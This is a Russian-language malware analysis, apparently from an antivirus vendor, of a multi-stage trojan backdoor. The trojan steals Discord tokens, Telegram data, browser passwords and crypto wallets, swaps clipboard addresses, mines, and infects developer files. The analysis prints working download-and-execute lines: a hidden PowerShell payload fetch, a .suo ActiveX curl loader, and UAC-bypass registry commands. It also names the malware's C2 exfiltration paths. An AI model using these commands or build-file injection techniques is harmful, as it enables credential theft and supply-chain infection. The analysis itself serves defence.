SHA1-хеши:
- 8030c42dc54975c43f7625d874e7890f025dc9f4
Описание
Является третьей стадией трояна, который выполняет сразу несколько функций: стилер, клиппер, бэкдор, майнер и источник заражения файлов:
- Первая стадия — Trojan.DownLoader49.35384,
- вторая — Trojan.DownLoader49.35687,
- третья — BackDoor.Siggen2.5906,
- четвертая — Trojan.Packed2.50953, загрузчик пятой стадии Trojan.BtcMine.3956.
Эта стадия закрепляется в системе и выполняет основную вредоносную деятельность.
Принцип действия
Подготовка к работе
Троян выполняет проверку запуска в песочнице. Для этого он изучает имя пользователя, оно не должно содержать строку «voke9asd89a8sd8aw8d8awd8a» и не должно называться «Srv». Затем он выполняет проверки, схожие с Trojan.DownLoader49.35687. В названии видеоадаптера, полученное с помощью CreateDXGIFactory() не должно быть следующих имен:
- unknown,
- Microsoft Basic Render,
- NVIDIA GeForce RTX 3060 Ti.
Также имя пользователя должно отличаться от любого из списка:
- george,
- Bruno,
- Abby,
- AMF,
- dx,
- John,
- elz,
- Admin.
Если проверка хотя бы по одному показателю проваливается, троян завершает работу. Далее BackDoor.Siggen2.5906 получает по именованному каналу pipe\\VccFramework идентификаторы трояна и домен управляющего сервера, с которым будет коммуницировать третья стадия. Затем троян создает объект синхронизации mutex c именем Global\PFNX_Side {Первая часть pipe\VccFramework}.
Коммуникация с C2 сервером
Расшифровав адрес, троян подключается к домену через url {C2 domain}/api/mnr/bobby31[.]php?security=Daytone&type=rtttry, откуда получает ключ для последующего шифрования данных при коммуникации с сервером. Если получить ключ этим способом не удается, троян использует сервис dns.google.com/resolve, через который получает IP-адрес C2 домена, преобразовывает его и использует как ключ.
Во время коммуникации с сервером троян шифрует передаваемые данные с помощью операции XOR, используя полученный ранее ключ. К данным также добавляются различные строки и идентификаторы пользователя.
Затем троян подключается к домену через {C2 domain}/api/mnr/bobby31[.]php?type=fudrocketmod&security={Первая часть pipe\VccFramework}. Он получает конфигурацию, в которой содержится информация о дальнейших действиях: нужно ли заразить Win SDK, криптокошелек Exodus и реестр программы WinRAR.
Закрепление в системе
Троян скачивает с url {C2 domain}/Stb/PokerFace/init[.]php?id=Mother файл «bungee.boo» и записывает его в директорию C:\ProgramData\bungee.boo. Этот файл реализует функции стадии 2 (Trojan.DownLoader49.35687). Затем он подменяет на него следующие DLL файлы:
- «profapi.dll» приложения Discord,
- «domain_actions.dll» в папке «Domain Actions» и «well_known_domains.dll» в папке «Well Known Domains», а также файлы manifest.json и manifest.fingerprint в обеих папках приложения Microsoft Edge,
- «C:\Windows\omadmapi.dll».
Дополнительно BackDoor.Siggen2.5906 может модифицировать системный реестр Windows таким образом, что при открытии архивированных файлов с помощью WinRar.exe будет запускаться вредоносный код.
Для действий, требующих прав администратора, троян использует технику обхода UAC. ВПО генерирует .vbs файл с названием из случайных цифр, в котором оставляет команду для выполнения с правами администратора. Далее через cmd.exe запускаются команды:
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe
%APPDATA%\Microsoft\369059.vbs" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
/c start /B ComputerDefaults.exe
Сбор информации
Троян собирает:
- username,
- CPU,
- GPU,
- ram,
- геолокацию.
Информация отправляется на {C2 domain}/api/mnr/bobby31[.]php?security=Daytone&type=process вместе со строкой «BrattSalllatSecretPlace62|».
Затем троян реализует 5 вредоносных функций: стилер, клиппер, бэкдор, майнер и источник заражения файлов.
Стилер
Троян крадет различную информацию с зараженного устройства: токены Discord, файлы Telegram, пароли и куки интернет-браузеров, данные криптокошелька Exodus.
-
Токены Discord.
В приложениях discord, discordptb, Lightcord, Opera, Opera GX, Brave-Browser, Chrome SxS, Chrome, Chromium, Edge, YandexBrowser троян ищет токены сервиса Discord. Они позволяют войти в аккаунты без обязательного ввода логина и пароля. Зашифрованные токены Discord — это строки, начинающиеся с префикса dQw4w9WgXcQ:. Троян ищет токены внутри содержимого файлов с расширениями .ldb или .log, хранящихся в каталоге LevelDB, расшифровывает их и получает информацию: ID, email, номер телефона, верифицирован ли аккаунт, наличие премиум-подписки. Украденные токены отправляются на {C2 domain}/api/mnr/bobby31[.]php?type=tknlogprcs&security=Daytone с добавленной строкой «MndayFrOppsLX|».
-
Файлы Telegram.
Троян ищет на компьютере папку приложения Telegram Desktop\tdata, архивирует файлы и отправляет на {C2 domain}/api/mnr/bobby31[.]php?type=APLATG&security=Daytone.
-
Пароли и куки.
Троян отправляет запрос на {C2 domain}/index[.]php?type=pexists&security=2. Ответным сообщением приходит конфигурация, в которой указано, нужно ли копировать пароли и/или куки. Пароли из браузеров Edge, Chrome и Brave расшифровываются, к ним добавляется строка «BabbChnnn64xaxz|» и далее они отправляются на {C2 domain}/api/mnr/bobby31[.]php?type=pssprc&security=Daytone. Куки из веб-браузеров Edge, Chrome, Brave, Mozilla, Opera также расшифровываются и отправляются на сервер.
Дополнительно троян обладает функциональностью запускать браузеры с параметрами --headless --disable-gpu --no-sandbox --disable-dev-shm-usage--user-data-dir={path} --remote-debugging-port=0' в скрытом окне.
Также троян скачивает файл CCCWF.tmp (Trojan.PWS.Siggen5.33623) в %TEMP% с {C2 domain}/Stb/PokerFace/init[.]php?id=Ppkvum. Данный файл внедряется в браузеры, затем он расшифровывает пароли и записывает их в файл с названием brx. В свою очередь, ключи шифрования сохраняются в файл crx. В файл dll_debug.txt записываются логи исполнения трояна.
Похищенные куки и файл brx с расшифрованными паролями троян отправляет на {C2 domain}/api/mnr/bobby31[.]php?type=ckiprc&security=Daytone с добавлением строки «WalterXPrxxxzCokerPro37&|-|&».
-
Данные Exodus
Троян ищет на зараженном устройстве папку криптокошелька Exodus. В случае обнаружения он архивирует ее и отправляет на {C2 domain}/api/mnr/bobby31[.]php?type=APLADEX&security=Daytone/.
Кроме хищений папок Exodus, троян производит модификацию криптокошелька. Для этого он находит файл app.asar и заменяет его на копию, скачанную с URL balista[.]lol/Stb/PokerFace/RTApp[.]txt при помощи curl. В подмененной версии в index.js (Trojan.Siggen32.44702) находится функция unlock(), которая при запуске отправляет мнемонические фразы кошелька на сервер злоумышленников.
Клиппер
-
Банковские карты
Используя регулярные выражения, троян постоянно следит за буфером обмена. Если ВПО обнаруживает в нем данные банковских карт, то отправляет их на {C2 domain}/api/mnr/bobby31[.]php?type=cclogentry&security=Daytone с добавлением строки «AtummmSalllllxXX1522|».
-
Криптовалюта
Троян отправляет запрос на {C2 domain}/api/mnr/bobby31[.]php?type=cryptosecr&security=Daytone со строкой «VooZXOOPPPS883321|». В ответ он получает адреса криптокошельков злоумышленников, которые троян будет использовать для подмены других адресов, найденных в буфере обмена.
Бэкдор
Троян получает новый ключ шифрования с {C2 domain}/api/mnr/bobby31[.]php?security=Daytone&type=rtttry. Далее он обращается к {C2 domain}/api/mnr/bobby31[.]php?type=pingcnfr&security=Daytone, откуда получает конфигурацию с перечислением действий для выполнения. Доступные команды для удаленного управления:
| exc | скачать файл с url при помощи curl и запустить его |
| RVRS | запустить Reverse Proxy |
| RUNCMD | запустить команду через cmd |
| GETFILE | загрузить содержимое определенного файла на управляющий сервер |
| LISTDIR | отправить список файлов из определенной директории компьютера на управляющий сервер |
| TROLL | запустить команду для троллинга пользователя, есть опции earrape, scary_sound, rickroll, mute_audio, jumpscare_screamer и т. д. |
Майнер
При помощи curl троян скачивает с сервера и запускает файл https://files[.]catbox[.]moe/lvh9j3[.]bin. Этот файл представляет собой загрузчик, который запускает скрытый майнер Trojan.BtcMine.3956.
Заражение файлов
Троян обращается к {C2 domain}/api/mnr/bobby31[.]php?type=stbcfg&security=Daytone&owr={Первая часть pipe\VccFramework} и получает конфигурацию с предписанием, какие файлы заражать. Возможные варианты:
- imgui_impl_win32.cpp,
- .suo,
- .exe,
- winnetwk.h (Windows SDK),
- .vcxproj и .csproj.
Чтобы определить пути к файлам, которые можно заразить, троян перебирает диски и запускает команду. Пример для диска A://
dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj > %ALLUSERSPROFILE%\ADat.bin3290
-
imgui_impl_win32.cpp. Trojan.Loader.3129
Объект для заражения — часть популярной библиотеки Dear ImGui. Она предназначена для создания графических интерфейсов для С++. Троян внедряет в файл две строки: в первой содержится пэйлоад, вторая запускает его.
В итоге создается команда
start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://exo-api[.]tf/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt' -OutFile $env:APPDATA\BK879002.exe; Start-Process -FilePath $env:APPDATA\BK879002.exe -WindowStyle Hidden }"Теперь созданные с помощью зараженного файла imgui_impl_win32.cpp приложения будут нести в себе вредоносный код и распространять заражение на другие компьютеры.
-
.suo. Trojan.Loader.3138
Это расширение файлов среды разработки Microsoft Visual Studio. В них хранятся настройки пользователя для определенных проектов. Троян заменяет оригинальный файл на зараженный, полученный с C2.
При открытии проекта в Visual Studio запускается вредоносный код:
javascript:new ActiveXObject('WScript.Shell').Run('cmd /b /c curl -o \"C:\\ProgramData\\S47LY.exe\" \"https://pee-files.nl/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt\" && start \"\" \"C:\\ProgramData\\S47LY.exe\"', 0, false);close(); -
winnetwk.h. Trojan.Loader.3184
Windows SDK — официальный набор инструментов Misrosoft, который позволяет создавать приложения для ОС Windows.
Троян ищет в реестре SOFTWARE\Microsoft\Windows Kits\Installed Roots значение KitsRoot10. Определив папку, в которую установлен Windows SDK, троян ищет в ней файл winnetwk.h, ответственный за работу с сетевыми ресурсами. Затем в него добавляется вредоносный код.
После этого все программы, созданные с помощью winnetwk.h, будут иметь вредоносный код.
-
.exe
Троян ищет подходящие .exe файлы и внедряет в них функции инициализации API и запуска initterm. Затем файл начинает работать как Trojan.DownLoader49.35384, он же стадия 1.
-
.vcxproj (Trojan.Loader.3128, Trojan.Loader.3127) и .csproj (Trojan.Loader.3126)
Это файлы проектов Visual Studio на языках программирования C++ и C#. В них добавляется команда PreBuildEvent, которая запускается перед каждой сборкой проекта. В ранних версиях добавлялся код
Сейчас код стал сложнее, в нем появилась дополнительная обфускация
В результате вредоносной команды записывается вредоносный .vbs файл, который, в свою очередь, запускает PowerShell payload. Троян делает запрос к URL-адресам:
- youtu[.]be/akoxddx6lgc,
- steamcommunity[.]com/profiles/76561198737324192.
На этих адресах хранится другой URL-адрес, зашифрованный с помощью base64. После расшифровки троян получает C2 домен, к которому обращается за нагрузкой, сходной с Trojan.DownLoader49.35687.
Матрица MITRE
| Этап | Тактика |
|---|---|
| Выполнение |
Интерпретаторы командной строки и сценариев (T1059) Выполнение с участием пользователя (T1204) |
| Закрепление |
Автозапуск при загрузке или входе в систему (T1547) Компрометация бинарных файлов ПО узла (T1554) |
| Повышение привилегий |
Внедрение кода в процессы (T1055) Обход контроля учетных записей (T1548.002) |
| Предотвращение обнаружения |
Обфусцированные файлы или данные (T1027) Маскировка (T1036) Обход виртуализации или песочницы (T1497) Обход контроля учетных записей (T1548.002) Внедрение кода в процессы (T1055) |
| Получение учетных данных |
Кража сессионных куки (T1539) Учетные данные из браузеров (T1555.003) |
| Обнаружение |
Запросы к реестру (T1012) Изучение владельца или пользователей системы (T1033) Изучение системы (T1082) Изучение файлов и каталогов (T1083) Обход виртуализации или песочницы (T1497) Изучение установленного ПО (T1518) Изучение местоположения системы (T1614) |
| Сбор данных |
Промежуточное хранение данных (T1074) Данные из буфера обмена (T1115) Архивация собранных данных (T1560) |
| Организация управления |
Протокол прикладного уровня (T1071) Веб-служба (T1102) Передача инструментов из внешней сети (T1105) Зашифрованный канал (T1573) |
| Эксфильтрация данных | Эксфильтрация по каналу управления (T1041) |
Подробнее об Trojan.DownLoader49.35384
Подробнее об Trojan.DownLoader49.35687
Подробнее об Trojan.BtcMine.3956